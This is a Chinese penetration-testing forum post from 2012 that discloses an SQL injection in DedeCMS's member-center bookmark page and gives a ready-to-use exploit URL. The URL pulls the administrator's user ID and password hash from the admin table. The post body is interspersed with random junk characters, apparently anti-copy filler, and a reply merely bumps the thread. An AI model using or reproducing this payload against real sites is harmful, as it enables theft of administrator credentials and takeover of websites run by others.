中国网络渗透测试联盟

标题: DedeCMS会员中心书签管理SQL注射漏洞 [打印本页]

作者: admin    时间: 2012-12-31 09:21
标题: DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
  {, j+ k8 n  _0 K. H( c6 J需要magic_quotes_gpc = Off; |- n3 E" O- T# |8 e% Z+ D
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.9 r* ?6 l; Y1 K% u+ c3 w, w$ F

( a; j+ e5 s* W8 T! ~: @DedeCMS会员中心书签管理SQL注射漏洞! F0 l3 h2 v6 E& E% W- a
成功利用该漏洞可获得管理员密码( o( H" H. O* K* W3 I( G; H) _& a

& \3 Q2 Q$ ]5 z0 J会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
6 ]6 p) {. g. W' c; }) C0 w5 |
% s* s% v- v2 \4 C1 L  F6 Ghttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r: A* z" k0 e. }* a- A! R8 A

作者: kook    时间: 2013-1-10 01:33
#89 顶起。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2